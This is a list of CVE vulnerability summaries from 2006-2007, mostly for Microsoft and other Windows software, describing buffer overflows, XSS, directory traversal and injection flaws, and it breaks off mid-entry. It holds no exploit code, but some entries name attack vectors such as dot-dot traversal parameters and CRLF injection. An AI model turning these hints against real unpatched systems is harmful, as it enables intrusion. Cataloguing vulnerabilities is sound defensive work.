Apple Safari 3.0.1 beta (522.12.12) on Windows allows remote attackers to modify the window title and address bar while filling the main window with arbitrary content by setting the location bar and using setTimeout() to create an event that modifies the window content, which could facilitate phishing attacks. [CVE-2007-2391] Cross-site scripting (XSS) vulnerability in Apple Safari Beta 3.0.1 for Windows allows remote attackers to inject arbitrary web script or HTML via a web page that includes a windows.setTimeout function that is activated after the user has moved from the current page. [CVE-2007-2389] Apple QuickTime for Java 7.1.6 on Mac OS X and Windows does not clear potentially sensitive memory before use, which allows remote attackers to read memory from a web browser via unknown vectors related to Java applets. [CVE-2007-2388] Apple QuickTime for Java 7.1.6 on Mac OS X and Windows does not properly restrict QTObject subclassing, which allows remote attackers to execute arbitrary code via a web page containing a user-defined class that accesses unsafe functions that can be leveraged to write to arbitrary memory locations. [CVE-2007-2380] The Microsoft Atlas framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking." [CVE-2007-2344] The BOOTPD component in Enterasys NetSight Console 2.1 and NetSight Inventory Manager 2.1, and possibly earlier, on Windows allows remote attackers to cause a denial of service (daemon crash) via a UDP packet that contains an invalid "packet type" field. [CVE-2007-2291] CRLF injection vulnerability in the Digest Authentication support for Microsoft Internet Explorer 7.0.5730.11 allows remote attackers to conduct HTTP response splitting attacks via a LF (%0a) in the username attribute. [CVE-2007-2279] The Scheduler Service (VxSchedService.exe) in Symantec Storage Foundation for Windows 5.0 allows remote attackers to bypass authentication and execute arbitrary code via certain requests to the service socket that create (1) PreScript or (2) PostScript registry values under Veritas\VxSvc\CurrentVersion\Schedules specifying future command execution. [CVE-2007-2269] Directory traversal vulnerability in top.php3 in SWsoft Plesk for Windows 8.1 and 8.1.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the locale_id parameter. [CVE-2007-2268] Multiple directory traversal vulnerabilities in SWsoft Plesk for Windows 7.6.1, 8.1.0, and 8.1.1 allow remote attackers to read arbitrary files via a .. (dot dot) in the locale_id parameter to (1) login.php3 or (2) login_up.php3. [CVE-2007-2238] Multiple stack-based buffer overflows in the Whale Client Components ActiveX control (WhlMgr.dll), as used in Microsoft Intelligent Application Gateway (IAG) before 3.7 SP2, allow remote attackers to execute arbitrary code via long arguments to the (1) CheckForUpdates or (2) UpdateComponents methods. [CVE-2007-2223] Microsoft XML Core Services (MSXML) 3.0 through 6.0 allows remote attackers to execute arbitrary code via the substringData method on a (1) TextNode or (2) XMLDOM object, which causes an integer overflow that leads to a buffer overflow. [CVE-2007-2222] Multiple buffer overflows in the (1) ActiveListen (Xlisten.dll) and (2) ActiveVoice (Xvoice.dll) speech controls, as used by Microsoft Internet Explorer 5.01, 6, and 7, allow remote attackers to execute arbitrary code via a crafted ActiveX object that triggers memory corruption, as demonstrated via the ModeName parameter to the FindEngine function in ACTIVEVOICEPROJECTLib.DirectSS. [CVE-2007-2161] Microsoft Internet Explorer 7 allows remote attackers to cause a denial of service (browser hang) via JavaScript that matches a regular expression against a long string, as demonstrated using /(.)/. [CVE-2007-2137] Heap-based buffer overflow in kde.dll in IBM Tivoli Monitoring Express 6.1.0 before Fix Pack 2, as used in Tivoli Universal Agent, Windows OS Monitoring agent, and Enterprise Portal Server, allows remote attackers to execute arbitrary code by sending a long string to a certain TCP port. [CVE-2007-2110] Unspecified vulnerability in the Core RDBMS component for Oracle Database 9.0.1.5 and 10.1.0.4 on Windows systems has unknown impact and attack vectors, aka DB03. NOTE: as of 20070424, Oracle has not disputed reliable claims that DB03 occurs because RDBMS uses a NULL Discretionary Access Control List (DACL) for the Oracle process and certain shared memory sections, which allows local users to inject threads and execute arbitrary code via the OpenProcess, OpenThread, and SetThreadContext functions (DB03). [CVE-2007-2108] Unspecified vulnerability in the Core RDBMS component in Oracle Database 9.0.1.5, 9.2.0.8, 10.1.0.5, and 10.2.0.2 on Windows allows remote attackers to have an unknown impact, aka DB01. NOTE: as of 20070424, Oracle has not disputed reliable claims that this issue occurs because the NTLM SSPI AcceptSecurityContext function grants privileges based on the username provided even though all users are authenticated as Guest, which allows remote attackers to gain privileges. [CVE-2007-2080] Multiple SQL injection vulnerabilities in XAMPP 1.6.0a for Windows allow remote attackers to execute arbitrary SQL commands via unspecified vectors in certain test scripts. [CVE-2007-2079] The ADONewConnection Connect function in adodb.php in XAMPP 1.6.0a and earlier for Windows uses untrusted input for the database server hostname, which allows remote attackers to trigger a library buffer overflow and execute arbitrary code via a long host parameter, or have other unspecified impact. NOTE: it could be argued that this is an issue in mssql_connect (CVE-2007-1411.1) in PHP, or an issue in the ADOdb Library, and the proper fix should be in one of these products [CVE-2007-1981] The safevoid_vsnprintf function in Metamod-P 1.19p29 and earlier on Windows allows remote attackers to cause a denial of service (daemon crash) via a long meta list command. [CVE-2007-1911] Multiple unspecified vulnerabilities in Microsoft Word 2007 allow remote attackers to cause a denial of service (CPU consumption) via crafted documents, as demonstrated by (1) file798-1.doc and (2) file613-1.doc, possibly related to a buffer overflow. [CVE-2007-1910] Buffer overflow in wwlib.dll in Microsoft Word 2007 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted document, as demonstrated by file789-1.doc. [CVE-2007-1876] VMware Workstation before 5.5.4, when running a 64-bit Windows guest on a 64-bit host, allows local users to "corrupt the virtual machine's register context" by debugging a local program and stepping into a "syscall instruction." [CVE-2007-1756] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2003 Viewer, and Office Excel 2007 does not properly validate version information, which allows user-assisted remote attackers to execute arbitrary code via a crafted Excel file, aka "Calculation Error Vulnerability". [CVE-2007-1754] PUBCONV.DLL in Microsoft Office Publisher 2007 does not properly clear memory when transferring data from disk to memory, which allows user-assisted remote attackers to execute arbitrary code via a malformed .pub page via a certain negative value, which bypasses a sanitization procedure that initializes critical pointers to NULL, aka the "Publisher Invalid Memory Reference Vulnerability". [CVE-2007-1751] Microsoft Internet Explorer 5.01, 6, and 7 allows remote attackers to execute arbitrary code by causing Internet Explorer to access an uninitialized or deleted object, related to prototype variables and table cells, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2007-1750] Unspecified vulnerability in Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code via a crafted Cascading Style Sheets (CSS) tag that triggers memory corruption. [CVE-2007-1747] Unspecified vulnerability in MSO.dll in Microsoft Office 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and 2007 allows user-assisted remote attackers to execute arbitrary code via a malformed drawing object, which triggers memory corruption. [CVE-2007-1593] The administrative service in Symantec Veritas Volume Replicator (VVR) for Windows 3.1 through 4.3, and VVR for Unix 3.5 through 5.0, in Symantec Storage Foundation products allows remote attackers to cause a denial of service (memory consumption and service crash) via a crafted packet to the service port (8199/tcp) that triggers a request for more memory than available, which causes the service to write to an invalid pointer. [CVE-2007-1580] FTPDMIN 0.96 allows remote attackers to cause a denial of service (daemon crash) via a LIST command for a Windows drive letter, as demonstrated using "//A:". NOTE: this has been reported as a buffer overflow by some sources, but there is not a long argument. [CVE-2007-1538] * DISPUTED McAfee VirusScan Enterprise 8.5.0.i uses insecure permissions for certain Windows Registry keys, which allows local users to bypass local password protection via the UIP value in (1) HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection or (2) HKEY_LOCAL_MACHINE\SOFTWARE\Network Associates\TVD\VirusScan Entreprise\CurrentVersion. NOTE: this issue has been disputed by third-party researchers, stating that the default permissions for HKEY_LOCAL_MACHINE\SOFTWARE does not allow for write access and the product does not modify the inherited permissions. There might be an interaction error with another product. [CVE-2007-1405] Cross-site scripting (XSS) vulnerability in the "download wiki page as text" feature in Trac before 0.10.3.1, when Microsoft Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2007-1382] The PHP COM extensions for PHP on Windows systems allow context-dependent attackers to execute arbitrary code via a WScript.Shell COM object, as demonstrated by using the Run method of this object to execute cmd.exe, which bypasses PHP's safe mode. [CVE-2007-1281] Kaspersky AntiVirus Engine 6.0.1.411 for Windows and 5.5-10 for Linux allows remote attackers to cause a denial of service (CPU consumption) via a crafted UPX compressed file with a negative offset, which triggers an infinite loop during decompression. [CVE-2007-1278] Unspecified vulnerability in the IIS connector in Adobe JRun 4.0 Updater 6, and ColdFusion MX 6.1 and 7.0 Enterprise, when using Microsoft IIS 6, allows remote attackers to cause a denial of service via unspecified vectors, involving the request of a file in the JRun web root. [CVE-2007-1262] Multiple cross-site scripting (XSS) vulnerabilities in the HTML filter in SquirrelMail 1.4.0 through 1.4.9a allow remote attackers to inject arbitrary web script or HTML via the (1) data: URI in an HTML e-mail attachment or (2) various non-ASCII character sets that are not properly filtered when viewed with Microsoft Internet Explorer. [CVE-2007-1239] Microsoft Excel 2003 does not properly parse .XLS files, which allows remote attackers to cause a denial of service (application crash) via a file with a (1) corrupted XML format or a (2) corrupted XLS format, which triggers a NULL pointer dereference. [CVE-2007-1238] Microsoft Office 2003 allows user-assisted remote attackers to cause a denial of service (application crash) by attempting to insert a corrupted WMF file. [CVE-2007-1221] The Hypervisor in Microsoft Xbox 360 kernel 4532 and 4548 allows attackers with physical access to force execution of the hypervisor syscall with a certain register set, which bypasses intended code protection. [CVE-2007-1220] The Hypervisor in Microsoft Xbox 360 kernel 4532 and 4548 does not properly verify the parameters passed to the syscall dispatcher, which allows attackers with physical access to bypass code-signing requirements and execute arbitrary code. [CVE-2007-1214] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2003 Viewer, and 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a crafted AutoFilter filter record in an Excel BIFF8 format XLS file, which triggers memory corruption. [CVE-2007-1203] Unspecified vulnerability in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2003 Viewer, 2004 for Mac, and 2007 allows user-assisted remote attackers to execute arbitrary code via a crafted set font value in an Excel file, which results in memory corruption. [CVE-2007-1202] Word (or Word Viewer) in Microsoft Office 2000 SP3, XP SP3, 2003 SP2, 2004 for Mac, and Works Suite 2004, 2005, and 2006 does not properly parse certain rich text "property strings of certain control words," which allows user-assisted remote attackers to trigger heap corruption and execute arbitrary code, aka the "Word RTF Parsing Vulnerability." [CVE-2007-1201] Unspecified vulnerability in certain COM objects in Microsoft Office Web Components 2000 allows user-assisted remote attackers to execute arbitrary code via vectors related to DataSource that trigger memory corruption, aka "Office Web Components DataSource Vulnerability." [CVE-2007-1196] Unspecified vulnerability in Citrix Presentation Server Client for Windows before 10.0 allows remote web sites to execute arbitrary code via unspecified vectors, related to the implementation of ICA connectivity through proxy servers. [CVE-2007-1117] Unspecified vulnerability in Publisher 2007 in Microsoft Office 2007 allows remote attackers to execute arbitrary code via unspecified vectors, related to a "file format vulnerability." NOTE: this information is based upon a vague pre-advisory with no actionable information. However, the advisory is from a reliable source. [CVE-2007-1114] The child frames in Microsoft Internet Explorer 7 inherit the default charset from the parent window when a charset is not specified in an HTTP Content-Type header or META tag, which allows remote attackers to conduct cross-site scripting (XSS) attacks, as demonstrated using the UTF-7 character set. [CVE-2007-1094] Microsoft Internet Explorer 7 allows remote attackers to cause a denial of service (NULL dereference and application crash) via JavaScript onUnload handlers that modify the structure of a document. [CVE-2007-1091] Microsoft Internet Explorer 7 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via onUnload Javascript handlers. [CVE-2007-1083] Buffer overflow in the Configuration Checker (ConfigChk) ActiveX control in VSCnfChk.dll 2.0.0.2 for Verisign Managed PKI Service, Secure Messaging for Microsoft Exchange, and Go Secure! allows remote attackers to execute arbitrary code via long arguments to the VerCompare method. [CVE-2007-1070] Multiple stack-based buffer overflows in Trend Micro ServerProtect for Windows and EMC 5.58, and for Network Appliance Filer 5.61 and 5.62, allow remote attackers to execute arbitrary code via crafted RPC requests to TmRpcSrv.dll that trigger overflows when calling the (1) CMON_NetTestConnection, (2) CMON_ActiveUpdate, and (3) CMON_ActiveRollback functions in (a) StCommon.dll, and (4) ENG_SetRealTimeScanConfigInfo and (5) ENG_SendEMail functions in (b) eng50.dll. [CVE-2007-1069] The memory management in VMware Workstation before 5.5.4 allows attackers to cause a denial of service (Windows virtual machine crash) by triggering certain general protection faults (GPF). [CVE-2007-0948] Heap-based buffer overflow in Microsoft Virtual PC 2004 and PC for Mac 7.1 and 7, and Virtual Server 2005 and 2005 R2, allows local guest OS administrators to execute arbitrary code on the host OS via unspecified vectors related to "interaction and initialization of components." [CVE-2007-0940] Unspecified vulnerability in the Cryptographic API Component Object Model Certificates ActiveX control (CAPICOM.dll) in Microsoft CAPICOM and BizTalk Server 2004 SP1 and SP2 allows remote attackers to execute arbitrary code via unspecified vectors, aka the "CAPICOM.Certificates Vulnerability." [CVE-2007-0939] Cross-site scripting (XSS) vulnerability in Microsoft Content Management Server (MCMS) 2001 SP1 and 2002 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving HTML redirection queries, aka "Cross-site Scripting and Spoofing Vulnerability." [CVE-2007-0938] Microsoft Content Management Server (MCMS) 2001 SP1 and 2002 SP2 does not properly handle certain characters in a crafted HTTP GET request, which allows remote attackers to execute arbitrary code, aka the "CMS Memory Corruption Vulnerability." [CVE-2007-0936] Multiple unspecified vulnerabilities in Microsoft Visio 2002 allow remote user-assisted attackers to execute arbitrary code via a Visio (.VSD, VSS, .VST) file with a crafted packed object that triggers memory corruption, aka "Visio Document Packaging Vulnerability." [CVE-2007-0934] Unspecified vulnerability in Microsoft Visio 2002 allows remote user-assisted attackers to execute arbitrary code via a Visio (.VSD, VSS, .VST) file with a crafted version number that triggers memory corruption. [CVE-2007-0933] Buffer overflow in the wireless driver 6.0.0.18 for D-Link DWL-G650+ (Rev. A1) on Windows XP allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a beacon frame with a long TIM Information Element. [CVE-2007-0913] Unspecified vulnerability in Microsoft Powerpoint allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as exploited by Trojan.PPDropper.G. NOTE: as of 20070213, it is not clear whether this is the same issue as CVE-2006-5296, CVE-2006-4694, CVE-2006-3876, CVE-2006-3877, or older issues. [CVE-2007-0870] Unspecified vulnerability in Microsoft Word 2000 allows remote attackers to cause a denial of service (crash) via unknown vectors, a different vulnerability than CVE-2006-5994, CVE-2006-6456, CVE-2006-6561, and CVE-2007-0515, a variant of Exploit-MS06-027. [CVE-2007-0842] The 64-bit versions of Microsoft Visual C++ 8.0 standard library (MSVCR80.DLL) time functions, including (1) localtime, (2) localtime_s, (3) gmtime, (4) gmtime_s, (5) ctime, (6) ctime_s, (7) wctime, (8) wctime_s, and (9) fstat, trigger an assertion error instead of a NULL pointer or EINVAL when processing a time argument later than Jan 1, 3000, which might allow context-dependent attackers to cause a denial of service (application exit) via large time values. NOTE: it could be argued that this is a design limitation of the functions, and the vulnerability lies with any application that does not validate arguments to these functions. However, this behavior is inconsistent with documentation, which does not list assertions as a possible result of an error condition. [CVE-2007-0780] browser.js in Mozilla Firefox 1.5.x before 1.5.0.10 and 2.x before 2.0.0.2, and SeaMonkey before 1.0.8 uses the requesting URI to identify child windows, which allows remote attackers to conduct cross-site scripting (XSS) attacks by opening a blocked popup originating from a javascript: URI in combination with multiple frames having the same data: URI. [CVE-2007-0711] Integer overflow in Apple QuickTime before 7.1.5, when installed on Windows operating systems, allows remote user-assisted attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted 3GP video file. [CVE-2007-0685] Internet Explorer on Windows Mobile 5.0 and Windows Mobile 2003 and 2003SE for Smartphones and PocketPC allows attackers to cause a denial of service (application crash and device instability) via unspecified vectors, possibly related to a buffer overflow. [CVE-2007-0678] SQL injection vulnerability in windows.asp in Fullaspsite Asp Hosting Sitesi allows remote attackers to execute arbitrary SQL commands via the kategori_id parameter. [CVE-2007-0674] Pictures and Videos on Windows Mobile 5.0 and Windows Mobile 2003 and 2003SE for Smartphones and PocketPC allows user-assisted remote attackers to cause a denial of service (device hang) via a malformed JPEG file. [CVE-2007-0671] Unspecified vulnerability in Microsoft Excel 2000, XP, 2003, and 2004 for Mac, and possibly other Office products, allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as demonstrated by Exploit-MSExcel.h in targeted zero-day attacks. [CVE-2007-0515] Unspecified vulnerability in Microsoft Word allows user-assisted remote attackers to execute arbitrary code on Word 2000, and cause a denial of service on Word 2003, via unknown attack vectors that trigger memory corruption, as exploited by Trojan.Mdropper.W and later by Trojan.Mdropper.X, a different issue than CVE-2006-6456, CVE-2006-5994, and CVE-2006-6561. [CVE-2007-0468] Stack-based buffer overflow in rcdll.dll in msdev.exe in Visual C++ (MSVC) in Microsoft Visual Studio 6.0 SP6 allows user-assisted remote attackers to execute arbitrary code via a long file path in the "1 TYPELIB MOVEABLE PURE" option in an RC file. [CVE-2007-0466] Telestream Flip4Mac Windows Media Components for Quicktime 2.1.0.33 allows remote attackers to execute arbitrary code via a crafted ASF_File_Properties_Object size field in a WMV file, which triggers memory corruption. [CVE-2007-0454] Format string vulnerability in the afsacl.so VFS module in Samba 3.0.6 through 3.0.23d allows context-dependent attackers to execute arbitrary code via format string specifiers in a filename on an AFS file system, which is not properly handled during Windows ACL mapping. [CVE-2007-0427] Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a help project (.HPJ) file with a long HLP field in the OPTIONS section. [CVE-2007-0352] Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a crafted .cnt file composed of lines that begin with an integer followed by a space and a long string. [CVE-2007-0341] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.8.1 and earlier, when Microsoft Internet Explorer 6 is used, allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in a CSS style in the convcharset parameter to the top-level URI, a different vulnerability than CVE-2005-0992. [CVE-2007-0221] Integer overflow in the IMAP (IMAP4) support in Microsoft Exchange Server 2000 SP3 allows remote attackers to cause a denial of service (service hang) via crafted literals in an IMAP command, aka the "IMAP Literal Processing Vulnerability." [CVE-2007-0220] Cross-site scripting (XSS) vulnerability in Outlook Web Access (OWA) in Microsoft Exchange Server 2000 SP3, and 2003 SP1 and SP2 allows remote attackers to execute arbitrary scripts, spoof content, or obtain sensitive information via certain UTF-encoded, script-based e-mail attachments, involving an "incorrectly handled UTF character set label". [CVE-2007-0219] Microsoft Internet Explorer 5.01, 6, and 7 uses certain COM objects from (1) Msb1fren.dll, (2) Htmlmm.ocx, and (3) Blnmgrps.dll as ActiveX controls, which allows remote attackers to execute arbitrary code via unspecified vectors, a different issue than CVE-2006-4697. [CVE-2007-0218] Microsoft Internet Explorer 5.01 and 6 allows remote attackers to execute arbitrary code by instantiating certain COM objects from Urlmon.dll, which triggers memory corruption during a call to the IObjectSafety function. [CVE-2007-0217] The wininet.dll FTP client code in Microsoft Internet Explorer 5.01 and 6 might allow remote attackers to execute arbitrary code via an FTP server response of a specific length that causes a terminating null byte to be written outside of a buffer, which causes heap corruption. [CVE-2007-0216] wkcvqd01.dll in Microsoft Works 6 File Converter, as used in Office 2003 SP2, Works 8.0, and Works Suite 2005, allows remote attackers to execute arbitrary code via a .wps file with crafted section length headers, aka "Microsoft Works File Converter Input Validation Vulnerability." [CVE-2007-0215] Stack-based buffer overflow in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, and 2003 Viewer allows user-assisted remote attackers to execute arbitrary code via a .XLS BIFF file with a malformed Named Graph record, which results in memory corruption. [CVE-2007-0213] Microsoft Exchange Server 2000 SP3, 2003 SP1 and SP2, and 2007 does not properly decode certain MIME encoded e-mails, which allows remote attackers to execute arbitrary code via a crafted base64-encoded MIME e-mail message. [CVE-2007-0209] Microsoft Word in Office 2000 SP3, XP SP3, Office 2003 SP2, Works Suite 2004 to 2006, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a Word file with a malformed drawing object, which leads to memory corruption. [CVE-2007-0208] Microsoft Word in Office 2000 SP3, XP SP3, Office 2003 SP2, Works Suite 2004 to 2006, and Office 2004 for Mac does not correctly check the properties of certain documents and warn the user of macro content, which allows user-assisted remote attackers to execute arbitrary code. [CVE-2007-0125] Kaspersky Labs Antivirus Engine 6.0 for Windows and 5.5-10 for Linux before 20070102 enter an infinite loop upon encountering an invalid NumberOfRvaAndSizes value in the Optional Windows Header of a portable executable (PE) file, which allows remote attackers to cause a denial of service (CPU consumption) by scanning a crafted PE file. [CVE-2007-0111] Buffer overflow in Resco Photo Viewer for PocketPC 4.11 and 6.01, as used in mobile devices running Windows Mobile 5.0, 2003, and 2003SE, allows remote attackers to execute arbitrary code via a crafted PNG image. [CVE-2007-0108] nwgina.dll in Novell Client 4.91 SP3 for Windows 2000/XP/2003 does not delete user profiles during a Terminal Service or Citrix session, which allows remote authenticated users to invoke alternate user profiles. [CVE-2007-0105] Stack-based buffer overflow in the CSAdmin service in Cisco Secure Access Control Server (ACS) for Windows before 4.1 and ACS Solution Engine before 4.1 allows remote attackers to execute arbitrary code via a crafted HTTP GET request. [CVE-2007-0099] Race condition in the msxml3 module in Microsoft XML Core Services 3.0, as used in Internet Explorer 6 and other applications, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via many nested tags in an XML document in an IFRAME, when synchronous document rendering is frequently disrupted with asynchronous events, as demonstrated using a JavaScript timer, which can trigger NULL pointer dereferences or memory corruption, aka "MSXML Memory Corruption Vulnerability." [CVE-2007-0087] DISPUTED ** Microsoft Internet Information Services (IIS), when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal. [CVE-2007-0060] Stack-based buffer overflow in the Message Queuing Server (Cam.exe) in CA (formerly Computer Associates) Message Queuing (CAM / CAFT) software before 1.11 Build 54_4 on Windows and NetWare, as used in CA Advantage Data Transport, eTrust Admin, certain BrightStor products, certain CleverPath products, and certain Unicenter products, allows remote attackers to execute arbitrary code via a crafted message to TCP port 3104. [CVE-2007-0047] CRLF injection vulnerability in Adobe Acrobat Reader Plugin before 8.0.0, when used with the Microsoft.XMLHTTP ActiveX object in Internet Explorer, allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the javascript: URI in the (1) FDF, (2) XML, or (3) XFDF AJAX request parameters. [CVE-2007-0039] The Exchange Collaboration Data Objects (EXCDO) functionality in Microsoft Exchange Server 2000 SP3, 2003 SP1 and SP2, and 2007 allows remote attackers to cause a denial of service (crash) via an Internet Calendar (iCal) file containing multiple X-MICROSOFT-CDO-MODPROPS (MODPROPS) properties in which the second MODPROPS is longer than the first, which triggers a NULL pointer dereference and an unhandled exception. [CVE-2007-0035] Word (or Word Viewer) in Microsoft Office 2000 SP3, XP SP3, 2003 SP2, 2004 for Mac, and Works Suite 2004, 2005, and 2006 does not properly handle data in a certain array, which allows user-assisted remote attackers to execute arbitrary code, aka the "Word Array Overflow Vulnerability." [CVE-2007-0034] Buffer overflow in the Advanced Search (Finder.exe) feature of Microsoft Outlook 2000, 2002, and 2003 allows user-assisted remote attackers to execute arbitrary code via a crafted Outlook Saved Searches (OSS) file that triggers memory corruption, aka "Microsoft Outlook Advanced Find Vulnerability." [CVE-2007-0033] Microsoft Outlook 2002 and 2003 allows user-assisted remote attackers to execute arbitrary code via a malformed VEVENT record in an .iCal meeting request or ICS file. [CVE-2007-0031] Heap-based buffer overflow in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows user-assisted remote attackers to execute arbitrary code via a BIFF8 spreadsheet with a PALETTE record that contains a large number of entries. [CVE-2007-0030] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows user-assisted remote attackers to execute arbitrary code via an Excel file with an out-of-range Column field in certain BIFF8 record types, which references arbitrary memory. [CVE-2007-0029] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows user-assisted remote attackers to execute arbitrary code via a malformed string, aka "Excel Malformed String Vulnerability." [CVE-2007-0028] Microsoft Excel 2000, 2002, 2003, Viewer 2003, Office 2004 for Mac, and Office v.X for Mac does not properly handle certain opcodes, which allows user-assisted remote attackers to execute arbitrary code via a crafted XLS file, which results in an "Improper Memory Access Vulnerability." NOTE: an early disclosure of this issue used CVE-2006-3432, but only CVE-2007-0028 should be used. [CVE-2007-0027] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows remote attackers to execute arbitrary code via malformed IMDATA records that trigger memory corruption. [CVE-2006-7192] Microsoft ASP .NET Framework 2.0.50727.42 does not properly handle comment (/* /) enclosures, which allows remote attackers to bypass request filtering and conduct cross-site scripting (XSS) attacks, or cause a denial of service, as demonstrated via an xss:expression STYLE attribute in a closing XSS HTML tag. [CVE-2006-7065] Microsoft Internet Explorer allows remote attackers to cause a denial of service (crash) via an IFRAME with a certain XML file and XSL stylesheet that triggers a crash in mshtml.dll when a refresh is called, probably a null pointer dereference. [CVE-2006-7031] Microsoft Internet Explorer 6.0.2900 SP2 and earlier allows remote attackers to cause a denial of service (crash) via a table element with a CSS attribute that sets the position, which triggers an "unhandled exception" in mshtml.dll. [CVE-2006-7030] Microsoft Internet Explorer 6 SP2 and earlier allows remote attackers to cause a denial of service (crash) via certain malformed HTML, possibly involving applet and base tags without required arguments, which triggers a null pointer dereference in mshtml.dll. [CVE-2006-7029] Microsoft Internet Explorer 6 SP2 and earlier allows remote attackers to cause a denial of service (crash) via a frameset with only one frame that calls resizeTo with certain arguments. NOTE: this issue might be related to CVE-2006-3637. [CVE-2006-7027] Microsoft Internet Security and Acceleration (ISA) Server 2004 logs unusual ASCII characters in the Host header, including the tab, which allows remote attackers to manipulate portions of the log file and possibly leverage this for other attacks. [CVE-2006-6971] Mozilla Firefox 2.0, possibly only when running on Windows, allows remote attackers to bypass the Phishing Protection mechanism by representing an IP address in (1) dotted-hex, (2) dotted-octal, (3) single decimal integer, (4) single hex integer, or (5) single octal integer format, which is not captured by the blacklist filter. [CVE-2006-6956] Microsoft Internet Explorer allows remote attackers to cause a denial of service (crash) via a web page that contains a large number of nested marquee tags, a related issue to CVE-2006-2723. [CVE-2006-6908] Buffer overflow in the Bluetooth Stack COM Server in the Widcomm Bluetooth stack, as packaged as Widcomm Stack 3.x and earlier on Windows, Widcomm BTStackServer 1.4.2.10 and 1.3.2.7 on Windows, Widcomm Bluetooth Communication Software 1.4.1.03 on Windows, and the Bluetooth implementation in Windows Mobile or Windows CE on the HP IPAQ 2215 and 5450, allows remote attackers to cause a denial of service (service crash) and possibly execute arbitrary code via unspecified vectors. [CVE-2006-6898] Widcomm Bluetooth for Windows (BTW) before 4.0.1.1500 allows remote attackers to listen to and record conversations, aka the CarWhisperer attack. [CVE-2006-6897] Directory traversal vulnerability in Widcomm Bluetooth for Windows (BTW) 3.0.1.905 allows remote attackers to conduct unauthorized file operations via a .. (dot dot) in an unspecified parameter. [CVE-2006-6853] Buffer overflow in Durian Web Application Server 3.02 freeware on Windows allows remote attackers to execute arbitrary code via a long string in a crafted packet to TCP port 4002. [CVE-2006-6714] Multiple memory leaks in Hitachi Directory Server 2 P-2444-A124 before 02-11-/K on Windows, and P-1B44-A121 before 02-10-/V on HP-UX, allow remote attackers to cause a denial of service (memory consumption) via invalid LDAP requests. [CVE-2006-6713] Buffer overflow in Hitachi Directory Server 2 P-2444-A124 before 02-11-/K on Windows, and P-1B44-A121 before 02-10-/V on HP-UX, allows remote attackers to execute arbitrary code via crafted LDAP requests. [CVE-2006-6617] projectserver/logon/pdsrequest.asp in Microsoft Project Server 2003 allows remote authenticated users to obtain the MSProjectUser password for a SQL database via a GetInitializationData request, which includes the information in the UserName and Password tags of the response. [CVE-2006-6578] Microsoft Internet Information Services (IIS) 5.1 permits the IUSR_Machine account to execute non-EXE files such as .COM files, which allows attackers to execute arbitrary commands via arguments to any .COM file that executes those arguments, as demonstrated using win.com when it is in a web directory with certain permissions. [CVE-2006-6561] Unspecified vulnerability in Microsoft Word 2000, 2002, and Word Viewer 2003 allows user-assisted remote attackers to execute arbitrary code via a crafted DOC file that triggers memory corruption, as demonstrated via the 12122006-djtest.doc file, a different issue than CVE-2006-5994 and CVE-2006-6456. [CVE-2006-6500] Heap-based buffer overflow in Mozilla Firefox 2.x before 2.0.0.1, 1.5.x before 1.5.0.9, Thunderbird before 1.5.0.9, and SeaMonkey before 1.0.7 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by setting the CSS cursor to certain images that cause an incorrect size calculation when converting to a Windows bitmap. [CVE-2006-6458] The Trend Micro scan engine before 8.320 for Windows and before 8.150 on HP-UX and AIX, as used in Trend Micro PC Cillin - Internet Security 2006, Office Scan 7.3, and Server Protect 5.58, allows remote attackers to cause a denial of service (CPU consumption and system hang) via a malformed RAR archive with an Archive Header section with the head_size and pack_size fields set to zero, which triggers an infinite loop. [CVE-2006-6456] Unspecified vulnerability in Microsoft Word 2000, 2002, and 2003 and Word Viewer 2003 allows remote attackers to execute code via unspecified vectors related to malformed data structures that trigger memory corruption, a different vulnerability than CVE-2006-5994. [CVE-2006-6443] Buffer overflow in the Novell Distributed Print Services (NDPS) Print Provider for Windows component (NDPPNT.DLL) in Novell Client 4.91 has unknown impact and remote attack vectors. [CVE-2006-6427] The Web User Interface in Xerox WorkCentre and WorkCentre Pro before 12.060.17.000, 13.x before 13.060.17.000, and 14.x before 14.060.17.000 allows remote attackers to execute arbitrary commands via unspecified vectors involving "command injection" in (1) the TCP/IP hostname, (2) Scan-to-mailbox folder names, and (3) 